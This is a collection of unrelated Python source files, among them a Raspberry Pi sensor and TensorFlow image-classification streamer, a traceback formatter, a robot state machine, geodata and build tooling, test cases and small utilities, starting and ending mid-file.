metavar='concurrency', default=3,
help='number of concurrent backend connections')
parser.add_argument('target', metavar='target', type=str,
help='local target port or address of server to tunnel to')
args = parser.parse_args()
start_client(**vars(args))
if __name__ == '__main__':
run()
|
python
|
# MP3
import selenium
import pygame
pygame.init()
pygame.mixer.init()
pygame.mixer.music.load('c:/Users/wmarc/OneDrive/Documentos/UNIVESP/Curso em Video/Desafio_021.mp3')
pygame.mixer.music.play()
pygame.event.wait()
|
python
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import argparse
import os.path
import re
import sys
import tarfile
import os
import datetime
import math
import random, string
import base64
import json
import time
from time import sleep
from time import gmtime, strftime
import numpy as np
from six.moves import urllib
import tensorflow as tf
import sys
import datetime
import subprocess
import os
import base64
import uuid
import datetime
import traceback
import math
import random, string
import socket
import base64
import json
import cv2
import math
import time
import psutil
import socket
from time import gmtime, strftime
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import sh1106
#
# Sensors
#
from bh1745 import BH1745
import VL53L1X
import ltr559
import bme680
from lsm303d import LSM303D
tf.logging.set_verbosity(tf.logging.ERROR)
FLAGS = None
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
# yyyy-mm-dd hh:mm:ss
currenttime= strftime("%Y-%m-%d %H:%M:%S",gmtime())
host = os.uname()[1]
def randomword(length):
return ''.join(random.choice(string.lowercase) for i in range(length))
class NodeLookup(object):
"""Converts integer node ID's to human readable labels."""
def __init__(self,
label_lookup_path=None,
uid_lookup_path=None):
if not label_lookup_path:
label_lookup_path = os.path.join(
'/tmp/imagenet', 'imagenet_2012_challenge_label_map_proto.pbtxt')
if not uid_lookup_path:
uid_lookup_path = os.path.join(
'/tmp/imagenet', 'imagenet_synset_to_human_label_map.txt')
self.node_lookup = self.load(label_lookup_path, uid_lookup_path)
def load(self, label_lookup_path, uid_lookup_path):
"""Loads a human readable English name for each softmax node.
Args:
label_lookup_path: string UID to integer node ID.
uid_lookup_path: string UID to human-readable string.
Returns:
dict from integer node ID to human-readable string.
"""
if not tf.gfile.Exists(uid_lookup_path):
tf.logging.fatal('File does not exist %s', uid_lookup_path)
if not tf.gfile.Exists(label_lookup_path):
tf.logging.fatal('File does not exist %s', label_lookup_path)
# Loads mapping from string UID to human-readable string
proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
uid_to_human = {}
p = re.compile(r'[n\d]*[ \S,]*')
for line in proto_as_ascii_lines:
parsed_items = p.findall(line)
uid = parsed_items[0]
human_string = parsed_items[2]
uid_to_human[uid] = human_string
# Loads mapping from string UID to integer node ID.
node_id_to_uid = {}
proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
for line in proto_as_ascii:
if line.startswith(' target_class:'):
target_class = int(line.split(': ')[1])
if line.startswith(' target_class_string:'):
target_class_string = line.split(': ')[1]
node_id_to_uid[target_class] = target_class_string[1:-2]
# Loads the final mapping of integer node ID to human-readable string
node_id_to_name = {}
for key, val in node_id_to_uid.items():
if val not in uid_to_human:
tf.logging.fatal('Failed to locate: %s', val)
name = uid_to_human[val]
node_id_to_name[key] = name
return node_id_to_name
def id_to_string(self, node_id):
if node_id not in self.node_lookup:
return ''
return self.node_lookup[node_id]
def create_graph():
"""Creates a graph from saved GraphDef file and returns a saver."""
# Creates graph from saved graph_def.pb.
with tf.gfile.FastGFile(os.path.join(
'/tmp/imagenet', 'classify_image_graph_def.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def run_inference_on_image(image):
"""Runs inference on an image.
Args:
image: Image file name.
Returns:
row
"""
if not tf.gfile.Exists(image):
tf.logging.fatal('File does not exist %s', image)
image_data = tf.gfile.FastGFile(image, 'rb').read()
# Creates graph from saved GraphDef.
create_graph()
with tf.Session() as sess:
# Some useful tensors:
# 'softmax:0': A tensor containing the normalized prediction across
# 1000 labels.
# 'pool_3:0': A tensor containing the next-to-last layer containing 2048
# float description of the image.
# 'DecodeJpeg/contents:0': A tensor containing a string providing JPEG
# encoding of the image.
# Runs the softmax tensor by feeding the image_data as input to the graph.
softmax_tensor = sess.graph.get_tensor_by_name('softmax:0')
predictions = sess.run(softmax_tensor,
{'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
# Creates node ID --> English string lookup.
node_lookup = NodeLookup()
tfrow = { }
top_k = predictions.argsort()[-1]
human_string = node_lookup.id_to_string(top_k)
score = predictions[top_k]
tfrow['human_string'] = str(human_string)
tfrow['score'] = str(score)
return tfrow
def maybe_download_and_extract():
"""Download and extract model tar file."""
dest_directory = '/tmp'
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
filename = DATA_URL.split('/')[-1]
filepath = os.path.join(dest_directory, filename)
if not os.path.exists(filepath):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' % (
filename, float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)
print()
statinfo = os.stat(filepath)
print('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
# TODO: send status message to screen
def do_nothing(obj):
pass
def send_tcp(s, message):
try:
s.sendall(message)
except:
print("Failed to send message")
def IP_address():
try:
s = socket.socket(socket_family, socket.SOCK_DGRAM)
s.connect(external_IP_and_port)
answer = s.getsockname()
s.close()
return answer[0] if answer else None
except socket.error:
return None
def getCPUtemperature():
res = os.popen('vcgencmd measure_temp').readline()
return(res.replace("temp=","").replace("'C\n",""))
# - start timing
starttime = datetime.datetime.now().strftime('%m/%d/%Y %H:%M:%S')
start = time.time()
external_IP_and_port = ('198.41.0.4', 53) # a.root-servers.net
socket_family = socket.AF_INET
# Set up OLED
oled = sh1106(i2c(port=1, address=0x3C), rotate=2, height=128, width=128)
oled.cleanup = do_nothing
# Set Constants
MAX_DISTANCE_MM = 800 # Distance at which our bar is full
TRIGGER_DISTANCE_MM = 80
# Ip address
ipaddress = IP_address()
# options
# 1 - read each sensor once per full call
# 2 - have app stream sensor values to MiniFi via File, TCP, MQTT, REST
# bh1745
bh1745 = BH1745()
bh1745.setup()
bh1745.set_leds(1)
r, g, b, c = bh1745.get_rgbc_raw()
bh1745.set_leds(0)
# VL53L1X
tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=0x29)
tof.open() # Initialise the i2c bus and configure the sensor
tof.start_ranging(2) # Start ranging, 1 = Short Range, 2 = Medium Range, 3 = Long Range
tof.stop_ranging() # Stop ranging
distance_in_mm = tof.get_distance() # Grab the range in mm
distance_in_mm = min(MAX_DISTANCE_MM, distance_in_mm) # Cap at our MAX_DISTANCE
# ltr559
lux = ltr559.get_lux()
prox = ltr559.get_proximity()
# bme680
try:
sensor = bme680.BME680(bme680.I2C_ADDR_PRIMARY)
except IOError:
sensor = bme680.BME680(bme680.I2C_ADDR_SECONDARY)
sensor.set_humidity_oversample(bme680.OS_2X)
sensor.set_pressure_oversample(bme680.OS_4X)
sensor.set_temperature_oversample(bme680.OS_8X)
sensor.set_filter(bme680.FILTER_SIZE_3)
sensor.set_gas_status(bme680.ENABLE_GAS_MEAS)
sensor.set_gas_heater_temperature(320)
sensor.set_gas_heater_duration(150)
sensor.select_gas_heater_profile(0)
# lsm303d
lsm = LSM303D(0x1d)
lsm3accl = lsm.accelerometer()
lsm3mag = lsm.magnetometer()
TCP_PORT = 5005 # define somewhere
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipaddress, TCP_PORT))
# tensorflow model
maybe_download_and_extract()
# start camera
time.sleep(0.5)
cap = cv2.VideoCapture(0)
time.sleep(3)
# loop forever
try:
while True:
row = { }
distance_in_mm = tof.get_distance() # Grab the range in mm
distance_in_mm = min(MAX_DISTANCE_MM, distance_in_mm) # Cap at our MAX_DISTANCE
lsm3accl = lsm.accelerometer()
lsm3mag = lsm.magnetometer()
lux = ltr559.get_lux()
prox = ltr559.get_proximity()
bh1745.set_leds(1)
r, g, b, c = bh1745.get_rgbc_raw()
bh1745.set_leds(0)
ret, frame = cap.read()
uuid2 = '{0}_{1}'.format(strftime("%Y%m%d%H%M%S",gmtime()),uuid.uuid4())
filename = 'images/bog_image_{0}.jpg'.format(uuid2)
filename2 = 'images/bog_image_p_{0}.jpg'.format(uuid2)
cv2.imwrite(filename, frame)
cpuTemp=int(float(getCPUtemperature()))
tfrow = run_inference_on_image(filename)
end = time.time()
row['human_string'] = tfrow['human_string']
row['score'] = tfrow['score']
row['imgname'] = filename
row['imgnamep'] = filename2
row['host'] = os.uname()[1]
row['cputemp'] = round(cpuTemp,2)
row['ipaddress'] = ipaddress
row['end'] = '{0}'.format( str(end ))
row['te'] = '{0}'.format(str(end-start))
row['BH1745_red'] = '{:3.1f}'.format(r)
row['BH1745_green'] = '{:3.1f}'.format(g)
row['BH1745_blue'] = '{:3.1f}'.format(b)
row['BH1745_clear'] = '{:3.1f}'.format(c)
row['VL53L1X_distance_in_mm'] = distance_in_mm
row['ltr559_lux'] = '{:06.2f}'.format(lux)
row['ltr559_prox'] = '{:04d}'.format(prox)
row['bme680_tempc'] = '{0:.2f}'.format(sensor.data.temperature)
row['bme680_tempf'] = '{0:.2f}'.format((sensor.data.temperature * 1.8) + 32)
row['bme680_pressure'] = '{0:.2f}'.format(sensor.data.pressure)
row['bme680_humidity'] = '{0:.3f}'.format(sensor.data.humidity)
row['lsm303d_accelerometer'] = "{:+06.2f}g : {:+06.2f}g : {:+06.2f}g".format(*lsm3accl)
row['lsm303d_magnetometer'] = "{:+06.2f} : {:+06.2f} : {:+06.2f}".format(*lsm3mag)
row['systemtime'] = datetime.datetime.now().strftime('%m/%d/%Y %H:%M:%S')
row['starttime'] = starttime
usage = psutil.disk_usage("/")
row['diskusage'] = "{:.1f}".format(float(usage.free) / 1024 / 1024)
row['memory'] = psutil.virtual_memory().percent
row['uuid'] = str(uuid2)
json_string = json.dumps(row)
json_string += str("\n")
send_tcp(s,json_string)
json_string = ""
with canvas(oled) as draw:
draw.rectangle(oled.bounding_box, outline="white", fill="black")
draw.text((0, 0), "- Apache NiFi MiniFi -", fill="white")
draw.text((0, 10), ipaddress, fill="white")
draw.text((0, 20), starttime, fill="white")
draw.text((0, 30), 'Temp: {}'.format( sensor.data.temperature ), fill="white")
draw.text((0, 40), 'Humidity: {}'.format( sensor.data.humidity ), fill="white")
draw.text((0, 50), 'Pressure: {}'.format( sensor.data.pressure ), fill="white")
draw.text((0, 60), 'Distance: {}'.format(str(distance_in_mm)), fill="white")
draw.text((0, 70), 'CPUTemp: {}'.format( cpuTemp ), fill="white")
draw.text((0, 80), 'TempF: {}'.format( row['bme680_tempf'] ), fill="white")
draw.text((0, 90), 'A: {}'.format(row['lsm303d_accelerometer']), fill="white")
draw.text((0, 100), 'M: {}'.format(row['lsm303d_magnetometer']), fill="white")
draw.text((0, 110), 'DU: {}'.format(row['diskusage']), fill="white")
time.sleep(0.5)
except:
print("Fail to send.")
|
python
|
#
# Copyright (c) SAS Institute, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""
Methods for formatting "extended" tracebacks with locals.
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import os
import sys
import types
import inspect
import itertools
import linecache
from six.moves import xmlrpc_client
from six.moves.reprlib import Repr
if (sys.version_info > (3, 0)):
# Python 3 code in this block
# Types for which calling __safe_str__ has side effects
UNSAFE_TYPES = (
xmlrpc_client.ServerProxy,
xmlrpc_client._Method,
)
# Types that should not appear in the output at all
IGNORED_TYPES = (
types.FunctionType,
types.ModuleType,
)
else:
# Python 2 code in this block
# Types for which calling __safe_str__ has side effects
UNSAFE_TYPES = (
xmlrpc_client.ServerProxy,
xmlrpc_client.MethodType,
)
# Types that should not appear in the output at all
IGNORED_TYPES = (
types.ClassType,
types.FunctionType,
types.ModuleType,
types.TypeType,
)
# Set for consumers to hook into for black listing their own classes.
UNSAFE_TYPE_NAMES = set()
class TraceRepr(Repr):
def __init__(self, subsequentIndent=""):
Repr.__init__(self)
self.maxtuple = 20
self.maxset = 160
self.maxlist = 20
self.maxdict = 20
self.maxstring = 1600
self.maxother = 160
self.maxLineLen = 160
self.subsequentIndent = subsequentIndent
# Pretty-print?
self._pretty = True
def _pretty_repr(self, pieces, iterLen, level):
ret = ', '.join(pieces)
if not self._pretty or len(ret) < self.maxLineLen:
return ret
padding = self.subsequentIndent + " " * (self.maxlevel - level)
sep = ',\n' + padding
return '\n' + padding + sep.join(pieces)
def _repr_iterable(self, obj, level, left, right, maxiter, trail=''):
n = len(obj)
if level <= 0 and n:
out = '...len=%d...' % n
else:
newlevel = level - 1
repr1 = self.repr1
pieces = [repr1(elem, newlevel)
for elem in itertools.islice(obj, maxiter)]
if n > maxiter:
pieces.append('...len=%d...' % n)
out = self._pretty_repr(pieces, n, level)
if n == 1 and trail:
right = trail + right
return '%s%s%s' % (left, out, right)
def repr_dict(self, obj, level):
n = len(obj)
if n == 0:
return '{}'
if level <= 0:
return '{...len=%d...}' % n
newlevel = level - 1
repr1 = self.repr1
pieces = []
for key in itertools.islice(sorted(obj), self.maxdict):
oldPretty = self._pretty
self._pretty = False
keyrepr = repr1(key, newlevel)
self._pretty = oldPretty
oldSubsequentIndent = self.subsequentIndent
self.subsequentIndent += ' ' * 4
valrepr = repr1(obj[key], newlevel)
self.subsequentIndent = oldSubsequentIndent
pieces.append('%s: %s' % (keyrepr, valrepr))
if n > self.maxdict:
pieces.append('...len=%d...' % n)
out = self._pretty_repr(pieces, n, level)
return '{%s}' % (out,)
def shouldSafeStr(obj):
if hasattr(types, 'InstanceType') and isinstance(obj, types.InstanceType):
# Old-style instances
cls = obj.__class__
else:
# New-style instances and non-instances
cls = type(obj)
if isinstance(obj, UNSAFE_TYPES):
return False
if cls.__name__ in UNSAFE_TYPE_NAMES:
return False
if not hasattr(obj, '__safe_str__'):
return False
if not callable(obj.__safe_str__):
return False
return True
def formatCode(frame, stream):
_updatecache = linecache.updatecache
def updatecache(*args):
# linecache.updatecache looks in the module search path for
# files that match the module name. This is a problem if you
# have a file without source with the same name as a python
# standard library module. We'll just check to see if the file
# exists first and require exact path matches.
if not os.access(args[0], os.R_OK):
return []
return _updatecache(*args)
linecache.updatecache = updatecache
try:
try:
frameInfo = inspect.getframeinfo(frame, context=1)
except: # noqa
frameInfo = inspect.getframeinfo(frame, context=0)
fileName, lineNo, funcName, text, idx = frameInfo
stream.write(' File "%s", line %d, in %s\n' %
(fileName, lineNo, funcName))
if text is not None and len(text) > idx:
# If the source file is not available, we may not be able to get
# the line
stream.write(' %s\n' % text[idx].strip())
finally:
linecache.updatecache = _updatecache
def formatLocals(frame, stream):
prettyRepr = TraceRepr(subsequentIndent=" " * 27).repr
for name, obj in sorted(frame.f_locals.items()):
if name.startswith('__') and name.endswith('__'):
# Presumably internal data
continue
if isinstance(obj, IGNORED_TYPES):
# Uninteresting things like functions
continue
try:
if shouldSafeStr(obj):
vstr = obj.__safe_str__()
else:
vstr = prettyRepr(obj)
except Exception as error:
# Failed to get a representation, but at least display what
# type it was and what exception was raised.
if hasattr(types, 'InstanceType') \
and isinstance(obj, types.InstanceType):
typeName = obj.__class__.__name__
else:
typeName = type(obj).__name__
vstr = '** unrepresentable object of type %r (error: %s) **' % (
typeName, error.__class__.__name__)
stream.write(" %15s : %s\n" % (name, vstr))
def stackToList(stack):
"""
Convert a chain of traceback or frame objects into a list of frames.
"""
if isinstance(stack, types.TracebackType):
while stack.tb_next:
stack = stack.tb_next
stack = stack.tb_frame
out = []
while stack:
out.append(stack)
stack = stack.f_back
return out
def formatTrace(excType, excValue, excTB, stream=sys.stderr, withLocals=True):
stream.write(str(excType))
stream.write(": ")
stream.write(str(excValue))
stream.write("\n\n")
tbStack = stackToList(excTB)
if withLocals:
stream.write("Traceback (most recent call first):\n")
else:
stream.write("Traceback (most recent call last):\n")
tbStack.reverse()
for frame in tbStack:
formatCode(frame, stream)
if withLocals:
formatLocals(frame, stream)
stream.write(" %s\n\n" % ("*" * 70))
|
python
|
from magicbot import StateMachine, state, timed_state
from components.cargo import CargoManipulator, Height
from components.vision import Vision
class CargoManager(StateMachine):
cargo_component: CargoManipulator
vision: Vision
def on_disable(self):
self.done()
def intake_floor(self, force=False):
self.engage(initial_state="move_to_floor", force=force)
@state(first=True, must_finish=True)
def move_to_floor(self, initial_call, state_tm):
self.cargo_component.move_to(Height.FLOOR)
self.cargo_component.intake()
self.next_state("intaking_cargo")
def outake_cargo_ship(self, force=False):
self.engage(initial_state="move_to_cargo_ship", force=force)
@state(must_finish=True)
def move_to_cargo_ship(self, initial_call, state_tm):
self.cargo_component.move_to(Height.CARGO_SHIP)
if self.cargo_component.at_height(Height.CARGO_SHIP):
self.next_state("outtaking_cargo")
def intake_loading(self, force=False):
self.engage(initial_state="move_to_loading_station", force=force)
@state(must_finish=True)
def move_to_loading_station(self, initial_call, state_tm):
self.cargo_component.move_to(Height.LOADING_STATION)
self.cargo_component.intake()
self.next_state("intaking_cargo")
@state(must_finish=True)
def intaking_cargo(self):
self.vision.use_cargo()
if self.cargo_component.is_contained():
self.next_state("finishing_intake")
else:
self.cargo_component.intake()
@state(must_finish=True)
def outtaking_cargo(self, initial_call, state_tm):
self.cargo_component.outtake()
if state_tm > 0.5:
self.vision.use_hatch()
self.done()
@timed_state(duration=1)
def finishing_intake(self):
self.cargo_component.slow_intake()
def done(self):
self.cargo_component.stop()
self.cargo_component.move_to(Height.LOADING_STATION)
super().done()
|
python
|
import os
import pandas
import geopandas
from shapely.geometry import Polygon, LineString
from shared import print_
geopandas.io.file.fiona.drvsupport.supported_drivers["KML"] = "rw"
COLUMNS_TO_DROP = ["Description"]
def generate_regions(**kwargs):
print_("GENERATE REGIONS", title=True)
print_("Parameters", section=True)
print_(kwargs)
data = _read_data(kwargs["inputs"])
data = _drop_unnecessary_columns(data)
data = _columns_to_lowercase(data)
print_("Info", section=True)
print_(data.crs)
print_(data.info())
print_("Preview", section=True)
print_(data.head(10))
data.to_file(kwargs["output"])
def _read_data(inputs):
data = geopandas.GeoDataFrame()
for _, __, files in os.walk(inputs):
for fname in files:
if not fname.lower().endswith(".kml"):
continue
data_new = geopandas.read_file(f"{inputs}{fname}", driver="KML")
data_new["region"] = fname.replace(".kml", "").replace(".KML", "")
if "boundary" in fname:
# new = data_new.groupby("region").apply(_to_line)
new = data_new.groupby("region").apply(_to_polygon)
else:
new = data_new.groupby("region").apply(_to_polygon)
data = pandas.concat([data, new.reset_index()], ignore_index=True)
data.columns = ["region", "geometry"]
return geopandas.GeoDataFrame(data, crs={"init": "EPSG:4326"})
def _to_line(x):
return _to_shape(LineString, x)
def _to_polygon(x):
return _to_shape(Polygon, x)
def _to_shape(shape, x):
return shape([p.x, p.y] for p in x["geometry"].tolist())
def _drop_unnecessary_columns(data):
for c in COLUMNS_TO_DROP:
if c in list(data.columns):
data.drop(columns=c, inplace=True)
return data
def _columns_to_lowercase(data):
data.columns = [c.lower() for c in list(data.columns)]
return data
|
python
|
# -*- coding: utf-8 -*-
import unittest
from copy import deepcopy
from openregistry.lots.core.tests.base import snitch
from openregistry.lots.bargain.tests.base import (
LotContentWebTest
)
from openregistry.lots.core.tests.blanks.json_data import test_loki_item_data
from openregistry.lots.bargain.tests.blanks.item_blanks import (
create_item_resource,
patch_item,
update_items_in_forbidden,
list_item_resource,
patch_items_with_lot
)
from openregistry.lots.bargain.constants import LOT_STATUSES
class LotItemResourceTest(LotContentWebTest):
initial_item_data = deepcopy(test_loki_item_data)
test_create_item_resource = snitch(create_item_resource)
test_patch_item_resource = snitch(patch_item)
test_list_item_resource = snitch(list_item_resource)
test_update_items_in_forbidden = snitch(update_items_in_forbidden)
test_patch_items_with_lot = snitch(patch_items_with_lot)
forbidden_item_statuses_modification = list(set(LOT_STATUSES) - {'draft', 'composing', 'pending'})
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(LotItemResourceTest))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
python
|
# -*- coding: utf-8 -*-
import re
from datetime import timedelta
from django.contrib.auth.models import Group
from django.contrib.auth import authenticate
from django.core.validators import EMPTY_VALUES
from django.db.models import Q
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from rest_framework import exceptions, serializers
from rest_framework.response import Response
from foundation.models import User
from foundation.custom.drf.validation import MatchingDuelFieldsValidator, EnhancedPasswordStrengthFieldValidator
class ResetPasswordSerializer(serializers.Serializer):
password = serializers.CharField(
required=True,
allow_blank=False,
max_length=63,
style={'input_type': 'password'},
validators = [
MatchingDuelFieldsValidator(
another_field='password_repeat',
message=_("Inputted passwords fields do not match.")
),
EnhancedPasswordStrengthFieldValidator()
]
)
password_repeat = serializers.CharField(
required=True,
allow_blank=False,
max_length=63,
style={'input_type': 'password'}
)
pr_access_code = serializers.CharField(
required=True,
allow_blank=False,
max_length=255,
style={'input_type': 'password'}
)
def validate(self, clean_data):
pr_access_code = clean_data['pr_access_code']
try:
clean_data['me'] = User.objects.get(pr_access_code=pr_access_code)
except User.DoesNotExist:
raise serializers.ValidationError(_("Password reset access code does not exist."))
return clean_data
|
python
|
import unittest
from tests.refactor.utils import RefactorTestCase
from unimport.constants import PY38_PLUS
class TypingTestCase(RefactorTestCase):
include_star_import = True
@unittest.skipIf(
not PY38_PLUS, "This feature is only available for python 3.8."
)
def test_type_comments(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import Any
from typing import Tuple
from typing import Union
def function(a, b):
# type: (Any, str) -> Union[Tuple[None, None], Tuple[str, str]]
pass
"""
)
@unittest.skipIf(
not PY38_PLUS, "This feature is only available for python 3.8."
)
def test_type_comments_with_variable(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import List
test_variable = [2] # type: List[int]
"""
)
@unittest.skipIf(
not PY38_PLUS, "This feature is only available for python 3.8."
)
def test_type_comment_params(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import List
def x(
f: # type:List,
r: # type:str
):
pass
"""
)
@unittest.skipIf(
not PY38_PLUS, "This feature is only available for python 3.8."
)
def test_type_comment_funcdef(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import List
def x(y):
# type: (str) -> List[str]
pass
"""
)
def test_variable(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import Dict, List
test: "List[Dict]"
"""
)
def test_function_arg(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import Dict, List
def test(arg:"List[Dict]") -> None:
pass
"""
)
def test_function_str_arg(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import Dict, Literal
def test(item, when: "Literal['Dict']") -> None:
pas
"""
)
def test_function_return(self):
self.assertActionAfterRefactorEqualToAction(
"""\
from typing import Dict, List
def test(arg: list) -> "List[Dict]":
pass
"""
)
|
python
|
# Copyright 2012 Google Inc. All Rights Reserved.
"""Simulator state rules for the build system.
Contains the following rules:
compile_simstate
"""
__author__ = '[email protected] (Ben Vanik)'
import io
import json
import os
import sys
import anvil.async
from anvil.context import RuleContext
from anvil.rule import Rule, build_rule
from anvil.task import Task, MakoTemplateTask
import anvil.util
# Enable importing local modules
sys.path.append(anvil.util.get_script_path())
def _get_template_paths():
template_path = os.path.join(anvil.util.get_script_path(), 'templates')
js_template = os.path.join(template_path, 'simstate_js.mako')
return (js_template)
SIM_TYPES_ = {
'Integer': {
'name': 'Integer',
'is_primitive': True,
'closure_type': 'number',
'default_value': '0',
},
'Float': {
'name': 'Float',
'is_primitive': True,
'closure_type': 'number',
'default_value': '0',
},
'Vec3': {
'name': 'Vec3',
'is_primitive': False,
'closure_type': 'goog.vec.Vec3.Float32',
'default_value': 'goog.vec.Vec3.createFloat32()',
'compare_fn': 'goog.vec.Vec3.equals',
'setter_fn': 'goog.vec.Vec3.setFromArray',
},
'Quaternion': {
'name': 'Quaternion',
'is_primitive': False,
'closure_type': 'goog.vec.Quaternion.Float32',
'default_value': 'goog.vec.Quaternion.createFloat32()',
'compare_fn': 'goog.vec.Vec4.equals',
'setter_fn': 'goog.vec.Quaternion.setFromArray',
'extra_args': ['normalized',],
},
'Color': {
'name': 'Color',
'is_primitive': True,
'closure_type': 'number',
'default_value': '0x00000000',
},
'String': {
'name': 'String',
'is_primitive': True,
'closure_type': 'string',
'default_value': '\'\'',
},
'EntityID': {
'name': 'EntityID',
'is_primitive': True,
'closure_type': 'number',
'default_value': 'gf.sim.NO_ENTITY_ID',
},
'UserID': {
'name': 'UserID',
'is_primitive': True,
'closure_type': 'string',
'default_value': '\'\'',
},
}
class SimVar(object):
"""Sim state variable.
"""
def __init__(self, json, *args, **kwargs):
"""Initializes a sim state varioable from the given JSON dict.
Args:
json: JSON dict.
"""
super(SimVar, self).__init__(*args, **kwargs)
self.json = json
self.name = json['name']
self.cap_name = self.name[0:1].capitalize() + self.name[1:]
self.type = SIM_TYPES_[json['type']]
self.entity_type = json.get('entity_type', None)
self.flags = self._parse_flags(json.get('flags', []))
self.onchange = json.get('onchange', '')
self.extra_args = ''
if self.type.get('extra_args', None):
for arg_name in self.type['extra_args']:
if len(self.extra_args):
self.extra_args += ', '
value = json.get(arg_name, 'undefined')
if value == True:
value = 'true'
elif value == False:
value = 'false'
self.extra_args += value
def _parse_flags(self, flags):
"""Parses a list of string flags and returns a string bitmask.
Args:
flags: A list of string flags.
Returns:
A string containing a bitmask of the given flags.
"""
s = ''
for flag in flags:
if len(s):
s += ' | '
s += 'gf.sim.VariableFlag.%s' % (flag)
if len(s):
return s
else:
return '0'
class SimState(object):
"""Sim state model.
"""
def __init__(self, src_path, json, *args, **kwargs):
"""Initializes a sim state model from the given JSON dict.
Args:
src_path: Source file path.
json: JSON dict.
"""
super(SimState, self).__init__(*args, **kwargs)
self.src_path = src_path
self.json = json
self.name = json['name']
self.super = json['super']
self.vars = []
for json_var in json['vars']:
self.vars.append(SimVar(json_var))
@build_rule('compile_simstate')
class CompileSimStateRule(Rule):
"""Sim state file compilation and code gen rule.
Will parse and generate simstate (.simstate) files.
Each input sim state translates to exactly one .js file.
Inputs:
srcs: All source simstate files.
Outputs:
A .js file for each input file.
"""
def __init__(self, name, *args, **kwargs):
"""Initializes a sim state compilation rule.
Args:
srcs: All source simstate files.
"""
super(CompileSimStateRule, self).__init__(name, *args, **kwargs)
(js_template) = _get_template_paths()
self._append_dependent_paths([
js_template])
class _Context(RuleContext):
def begin(self):
super(CompileSimStateRule._Context, self).begin()
(js_template) = _get_template_paths()
ds = []
for src_path in self.src_paths:
js_path = os.path.splitext(self._get_gen_path_for_src(src_path))[0]
js_path += 'state.js'
self._ensure_output_exists(os.path.dirname(js_path))
self._append_output_paths([js_path])
# TODO(benvanik): move parsing to another task
with io.open(src_path) as f:
file_str = f.read()
simstate_json = json.loads(file_str)
simstate = SimState(src_path, simstate_json)
ds.append(self._run_task_async(MakoTemplateTask(
self.build_env, js_path, js_template, {
'state': simstate,
})))
# Kick off optimizations
dg = anvil.async.gather_deferreds(ds, errback_if_any_fail=True)
self._chain(dg)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 14 14:32:57 2020
@author: Administrator
"""
"""
回文字符串是指一个字符串从左到右与从右到左遍历得到的序列是相同的.例如"abcba"就是回文字符串,而"abcab"则不是回文字符串.
"""
def AddSym2Str(s):
if len(s) == 0:
return '*'
return ('*' + s[0] + AddSym2Str(s[1:]))
def GetPalLen(i , s):
lens = 0 ; j = 0 ; tmp = ''
while (i - j >= 0) and (i + j < len(s)) and (s[i-j] == s[i+j]):
if j == 0:
tmp = s[i]
else:
tmp = s[i-j] + tmp +s[i+j]
lens += 1 ; j += 1
return (2 * lens - 1) , tmp
def GetLongestPalStr(s):
s = AddSym2Str(s)
# print(s)
p = [] ; strlongest = ''
for i in range(len(s)):
tmplen , tmpstr = GetPalLen(i , s)
if len(p) == 0:
strlongest = tmpstr
elif tmplen > max(p):
strlongest = tmpstr
p.append(tmplen)
return p , strlongest
if __name__ == "__main__":
s = "abcdefgfedxyz"
p , strlongest = GetLongestPalStr(s)
strlongest = strlongest.replace("*", "")
print("The longest palindrome string is : " ,strlongest)
print("The longest length is : " , int((max(p) - 1) / 2))
|
python
|
from bson import ObjectId
from db.db import Database
from db.security import crypt
import datetime
class Users(Database):
_id: str
name: str
cpf: str
email: str
phone_number: int
created_at: str
updated_at: str
def __init__(self):
super().__init__()
def create_user(self, user_data: dict):
try:
self.name = crypt(user_data["name"])
self.cpf = crypt(user_data["cpf"])
self.email = crypt(user_data["email"])
self.phone_number = crypt(user_data["phone_number"])
return True
except Exception as erro:
print(str(erro))
return False
def insert_user(self) -> bool:
try:
